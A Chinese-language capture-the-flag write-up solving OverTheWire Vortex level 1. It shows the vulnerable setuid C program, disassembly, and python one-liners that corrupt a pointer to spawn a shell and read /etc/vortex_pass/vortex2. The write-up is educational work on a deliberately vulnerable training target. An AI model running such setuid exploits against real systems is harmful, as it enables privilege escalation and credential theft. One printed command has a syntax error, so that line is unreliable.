Vortex Wargame通关记录——Level 1

Level 1 -> Level 2

本级的目标是通过一个有缺陷的程序获取下一关用户的密码。密码存放在/etc/vortex_pass/vortex2中。
程序代码如下:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>


#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }

void print(unsigned char *buf, int len)
{
        int i;

        printf("[ ");
        for(i=0; i < len; i++) printf("%x ", buf[i]); 
        printf(" ]\n");
}

int main()
{
        unsigned char buf[512];
        unsigned char *ptr = buf + (sizeof(buf)/2);
        unsigned int x;

        while((x = getchar()) != EOF) {
                switch(x) {
                        case '\n': print(buf, sizeof(buf)); continue; break;
                        case '\\': ptr--; break; 
                        default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;
                }
        }
        printf("All done\n");
}

可以看到，这个程序是会读取用户输入，并且根据输入，通过一个switch语句执行不同的操作。当遇到’\n的时候打印出buf；当遇到\\的时候指针会向后移动；其他情况下会向前移动并赋值。
使用上一关得到的vortex1的密码登录后，进入/vortex目录，用ls -l指令可以得到：
-r-sr-x--- 1 vortex2 vortex1 7607 Feb 4 05:21 vortex1
vortex1文件，即以上代码编译得到的可执行程序，所属用户是vortex2，所属组是vortex1。并且在执行权限中，setuid位被置。就意味着在执行vortex1时，可以临时使用vortex2的权限，利用这一权限就可以打开存有密码的文件，得到下一关密码。
从源代码中可以看到，函数e()中可以设置uid并且打开一个shell。因此只要我们触发e()中的条件，就可以利用shell查看密码了。

Challenge 1

那么怎么样触发条件呢？它的要求是ptr的高位是0xca，显然我们不大可能将ptr准确移动到0xca的位置，而需要修改ptr的值。
通过观察可以发现，ptr的初始位置在buf的正中间，即buf + 256，而我们可以通过输入\\和其他字符来移动ptr，因此可以通过找到ptr相对buf的位置，从而修改ptr的值。
可以通过objdump查看汇编指令：

80485dd:       8d 44 24 1c             lea    0x1c(%esp),%eax
80485e1:       05 00 01 00 00          add    $0x100,%eax
80485e6:       89 44 24 14             mov    %eax,0x14(%esp)
80485ea:       e9 9f 00 00 00          jmp    804868e <main+0xce>
80485ef:       8b 44 24 18             mov    0x18(%esp),%eax
80485f3:       83 f8 0a                cmp    $0xa,%eax

通过比较C语言可以得到，buf在0x1c，ptr在0x14，x在0x18，和声明的顺序不太一样。因此我们可以得出，从buf移动到ptr的高位（小端序机器）需要回退256+4+1=261次。在回退之后，再输入0xca就可以将高位修改为0xca，再输入一个其他字符，就可以触发函数e()中的条件。
为了便于输入，我们用python的print指令。
python -c 'print "\\" * 261 + "\xca" + "a"' | /vortex/vortex1
当然，这样写不会有什么效果，因为这样虽然打开了一个shell，但没有给它任何指令。我们加上打开密码文件的指令。
python -c 'print "\\" * 261 + "\xca" + "a" + "\ncat /etc/vortex_pass/vortex2\n"' | /vortex/vortex1
但是这样也没有效果。这就出现了另一个问题，即shell处理EOF的问题。

Challenge 2

在执行execlp时，STDIN没有清除，因此shell会遇到EOF并退出。解决这一问题有两种方法。

方法1

可以利用ENV，当shell以sh的名字启动时，bash会寻找变量ENV，读取它对应的文件并执行其中的命令。因此我们只需要在一个文件里写上命令：
cat /etc/vortex_pass/vortex2
然后再将执行的命令改为
python -c 'print "\\" * 261 + "\xca" + "a"' | env ENV=/tmp/xxx /vortex/vortex1
即可。
在服务器端，创建文件必须在/tmp目录下。

方法2

由于kernel的STDIN使用了一个循环buffer，因此可以用超长的字符串冲掉原有的EOF。buffer长度为4096个字节。需要的额外字符长度=4096-261-2-1=3832个字节。
因此可以将执行的命令改为
python -c 'print "\\" * 261 + "\xca" + "a" + "a" * 3832 "\ncat /etc/vortex_pass/vortex2\n"' | /vortex/vortex1

最终可以打印出下一关的密码。

参考资料

https://mcpa.github.io/vortex/wargame/web/overthewire/2015/10/21/vortex01/
http://ins3cure.blogspot.com/2012/09/overthewire-vortex-level-1.html